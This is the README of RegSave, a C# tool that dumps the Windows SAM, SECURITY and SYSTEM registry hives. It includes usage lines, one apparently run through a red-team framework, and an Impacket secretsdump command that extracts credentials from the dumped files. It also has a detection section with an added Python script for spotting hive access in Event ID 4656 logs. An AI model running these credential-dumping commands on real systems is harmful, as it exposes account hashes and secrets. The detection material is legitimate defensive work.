RegSave

A .NET implementation to dump SAM / SECURITY / SYSTEM registry hives


A .NET 3.5 application that dumps the SAM, SYSTEM and SECURITY registry hives to a path of your choosing.

Usage

regsave.exe c:\Users\USER\Appdata\Local
execute-assembly /opt/CS/toolkit/regsave.exe c:\Users\USER\Appdata\Local

Collect the files and then parse them with Impacket's secretsdump:

secretsdump.py -sam samantha.txt -security secundum.txt -system systemless.txt LOCAL

Detection

MITRE ATT&CK: T1003.002

Look for Event ID 4656 in the Security event log after configuring the audit policy.

More info at "Detecting Attempts to Steal Passwords from the Registry".
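
One way to triage the 4656 events mentioned above, as an added example that is not part of the RegSave project: it flags any process that requests handles to all three hive root keys within a short window. It assumes the Security log has already been exported to dictionaries keyed by the 4656 field names and that auditing is enabled on the hive keys; the allowlist, the 60-second window and the sample records are constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Hive root keys as they appear in the ObjectName field of Event ID 4656.
HIVES = {r"\REGISTRY\MACHINE\SAM", r"\REGISTRY\MACHINE\SECURITY",
         r"\REGISTRY\MACHINE\SYSTEM"}
# Assumption: processes expected to open these keys in this environment.
ALLOWED = {r"c:\windows\system32\lsass.exe"}

def find_hive_dump_candidates(events, window=timedelta(seconds=60)):
    """Return (computer, pid, process) for processes that hit all three hives within `window`."""
    per_proc = defaultdict(list)
    for ev in events:
        if ev.get("EventID") != 4656 or ev.get("ObjectType") != "Key":
            continue
        name = ev.get("ObjectName", "").upper()
        proc = ev.get("ProcessName", "")
        if name not in HIVES or proc.lower() in ALLOWED:
            continue
        ts = datetime.fromisoformat(ev["TimeCreated"])
        per_proc[(ev["Computer"], ev["ProcessId"], proc)].append((ts, name))
    hits = []
    for key, seen in per_proc.items():
        seen.sort()
        for i, (start, _) in enumerate(seen):
            touched = {n for t, n in seen[i:] if t - start <= window}
            if touched == HIVES:  # all three hives requested inside the window
                hits.append(key)
                break
    return hits

def _ev(ts, proc, pid, obj):
    # Build one constructed record (not a real log line).
    return {"EventID": 4656, "TimeCreated": ts, "Computer": "WS01.example.test",
            "ObjectType": "Key", "ObjectName": "\\REGISTRY\\MACHINE\\" + obj,
            "ProcessId": pid, "ProcessName": proc}

SAMPLE = [
    _ev("2024-01-01T10:00:00", r"C:\Temp\example.exe", "0x1a2c", "SAM"),
    _ev("2024-01-01T10:00:01", r"C:\Temp\example.exe", "0x1a2c", "SECURITY"),
    _ev("2024-01-01T10:00:02", r"C:\Temp\example.exe", "0x1a2c", "SYSTEM"),
    _ev("2024-01-01T10:00:03", r"C:\Windows\System32\lsass.exe", "0x2d4", "SAM"),
    _ev("2024-01-01T10:05:00", r"C:\Windows\System32\svchost.exe", "0x5f0", "SYSTEM"),
]

if __name__ == "__main__":
    for hit in find_hive_dump_candidates(SAMPLE):
        print("possible hive dump:", hit)
```

Requiring all three hives from one process keeps routine single-key reads of SYSTEM out of the results; tune the allowlist to the backup and management agents actually deployed.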


Languages

C#

Security Score

80/100

Audited on Mar 25, 2026

No findings